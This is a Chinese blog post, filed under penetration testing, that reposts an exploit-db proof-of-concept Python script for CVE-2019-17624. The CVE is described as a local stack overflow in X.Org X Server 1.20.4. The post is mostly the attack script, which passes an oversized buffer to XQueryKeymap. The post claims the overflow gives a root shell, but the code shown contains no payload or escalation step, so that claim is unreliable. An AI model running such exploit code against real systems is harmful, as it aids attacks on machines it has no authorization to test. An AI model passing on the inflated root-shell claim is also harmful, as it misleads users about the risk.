CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC

2019-10-16 / 0 评论 渗透测试 / Mrxn

本文共计 983 字,感谢您的耐心浏览与评论.

CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC
0x1 简单介绍
X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序,是系统标配。而此程序也是以Root权限启动的,因而成功溢出它而获得的shell,也是root权限。
0x2 漏洞相关信息
# 时间: 2019-10-16

# 作者: Marcelo Vázquez (s4vitar)

# 厂商: https://www.x.org/

# 版本: <= 1.20.4

# 测试平台: Linux

# CVE: CVE-2019-17624

0x3 POC
#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes import cast
from ctypes.util import find_library

def access_violation(x11, current_display):
  keyboard = (ct.c_char * 1000)()
  x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

  print "\n[*] Loading x11...\n"
  time.sleep(2)

  x11 = ct.cdll.LoadLibrary(find_library("X11"))
  current_display = x11.XOpenDisplay(None)

  print "[*] Exploiting...\n"
  time.sleep(1)

  try:
    access_violation(x11, current_display)

  except:
    print "\nError...\n"
    sys.exit(1)

参考: https://www.exploit-db.com/exploits/47507

标签: 渗透测试 黑客 Linux 漏洞 cve

转载:转载请注明原文链接 - CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC


0条回应:“CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC”


发表评论

{view_code_no}